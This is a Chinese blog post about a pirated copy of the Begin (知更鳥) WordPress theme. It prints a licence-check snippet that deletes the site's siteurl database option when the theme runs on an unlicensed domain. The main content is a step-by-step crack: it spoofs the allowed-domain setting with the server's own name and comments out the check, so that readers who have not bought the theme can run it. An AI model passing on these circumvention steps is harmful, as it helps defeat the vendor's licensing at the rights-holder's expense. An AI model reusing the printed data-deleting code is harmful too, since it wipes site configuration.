記錄一次知更鳥WordPress主題包惡意文件
[重要通告]如您遇疑難雜癥,本站支持知識付費業務,掃右邊二維碼加博主微信,可節省您寶貴時間哦!
文件有三個分別是:
begin/inc/config.php
begin/inc/call.php
begin/inc/load.php
惡意代碼所在文件:
begin/inc/call.php
begin/inc/load.php
授權代碼所在文件:
begin/inc/config.php
使用的是偽授權方法:
1、修改:begin/inc/config.php
$add_domain='xxx.cn,xxx.com,ssr.plus,localhost';
可能你解密后的文件里面的域名跟我發的教程不一樣!
將$add_domain=’xxx.cn,xxx.com,ssr.plus,localhost’;修改為:$add_domain=$_SERVER[‘SERVER_NAME’];
2、注釋代碼:
文件分別是:
begin/inc/call.php
begin/inc/load.php
將
if (!in_array('localhost', $allow_domain)) {
global $wpdb;
$wpdb->query('DELETE FROM ' . $wpdb->options . ' WHERE option_name = \'siteurl\'');
這段IF代碼注釋掉,如果不注釋掉,你的Wordpress數據庫必然被惡意修改,就算使用Wordpress自帶的修復工具也是無法修復的!
注釋掉:
if (!in_array('localhost', $allow_domain)) {
global $wpdb;
$wpdb->query('DELETE FROM ' . $wpdb->options . ' WHERE option_name = \'siteurl\'');
代碼后保存文件,然后在啟用主題,你會發現主題已經正常使用!!!
切記暫且沒有能力購買主題正版的同學,一定要經常備份數據庫,不然最后哭都來不及,如有“實力”請支持正版;
問題未解決?付費解決問題加Q或微信 2589053300 (即Q號又微信號)右上方掃一掃可加博主微信
所寫所說,是心之所感,思之所悟,行之所得;文當無敷衍,落筆求簡潔。 以所舍,求所獲;有所依,方所成!
賞
支付寶贊助
微信贊助
免責聲明,若由于商用引起版權糾紛,一切責任均由使用者承擔。
您必須遵守我們的協議,如您下載該資源,行為將被視為對《免責聲明》全部內容的認可->聯系老梁投訴資源 LaoLiang.Net部分資源來自互聯網收集,僅供用于學習和交流,請勿用于商業用途。如有侵權、不妥之處,請聯系站長并出示版權證明以便刪除。
敬請諒解! 侵權刪帖/違法舉報/投稿等事物聯系郵箱:service@laoliang.net
意在交流學習,歡迎贊賞評論,如有謬誤,請聯系指正;轉載請注明出處: » 記錄一次知更鳥WordPress主題包惡意文件
測試不登陸評論,06929